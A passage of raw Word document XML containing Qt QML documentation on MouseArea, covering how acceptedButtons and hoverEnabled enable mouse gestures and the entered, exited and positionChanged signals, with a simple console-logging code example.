          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"mouse entered the area"</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onExited</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"mouse left the area"</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </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B82406">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1870" w:name="enabling-gestures"/>
      <w:bookmarkStart w:id="1871" w:name="_Toc483000935"/>
      <w:bookmarkStart w:id="1872" w:name="_Toc483003926"/>
      <w:bookmarkStart w:id="1873" w:name="_Toc483604278"/>
      <w:bookmarkStart w:id="1874" w:name="_Toc483605498"/>
      <w:bookmarkEnd w:id="1870"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enabling Gestures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1871"/>
      <w:bookmarkEnd w:id="1872"/>
      <w:bookmarkEnd w:id="1873"/>
      <w:bookmarkEnd w:id="1874"/>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some mouse gestures and button clicks need to be enabled before they send or receive events</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Certain</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2215" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2216" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseEvent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties enable these gestures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To listen to (or explicitly ignore) a certain mouse button, set the appropriate mouse button to the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2217" w:anchor="acceptedButtons-prop" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>acceptedButtons</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Naturally</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the mouse </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>events</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as button presses and mouse positions, are </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sent during a mouse click</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>containsMouse</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property will only retrieve its correct value during a mouse press. The</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2218" w:anchor="hoverEnabled-prop" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>hoverEnabled</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will enable mouse events and positioning even when there are no mouse button presses. Setting the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hoverEnabled</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, in turn will enable the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>entered</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exited</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>positionChanged</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal and their respective signal handlers.</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w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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hoverEnabled</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w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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acceptedButtons</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w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LeftButton</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RightButton</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onEntered</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"mouse entered the area"</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9210E8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        onExited</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 xml:space="preserve"> console</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
